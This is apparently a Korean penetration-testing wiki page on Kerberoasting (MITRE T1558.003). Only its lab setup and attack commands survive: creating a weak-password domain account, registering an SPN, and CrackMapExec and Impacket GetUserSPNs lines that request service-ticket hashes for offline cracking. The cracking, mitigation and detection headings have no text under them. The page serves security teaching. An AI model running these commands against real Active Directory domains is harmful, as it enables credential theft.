커버로스팅 (Kerberoasting)
MITRE ATTACK - T1558.003
개념
환경 준비
net user sqladmin Password123! /domain /add
setspn -A <서비스_이름>/<호스트_FQDN>:<포트> <서비스_계정_이름>
setspn -A MSSQL/dc01.choi.local:31337 sqladmin공격
# CrackMapExec
cme ldap 192.168.40.150 -u low -p 'Password123!' -d choi.local --kerberoasting kerberoast.hashes
# CrackMapExec - hash
cme ldap 192.168.40.150 -u low -H <NT해시>--kerberoast kerberoast.hashes
# Impacket - GetUSersSPNs
impacket-GetUserSPNs -request 'choi.local/low:Password123!' -outputfile kerberoast.hash
# impacket - GetUsersSPNs - hash
impacket-GetUserSPNs -request 'choi.local/low' -hashes <LM해시>:<NT해시> -outputfile kerberoast.hash브루트포스와 TGS 복호화
대응 방안
탐지 방안
레퍼런스
Last updated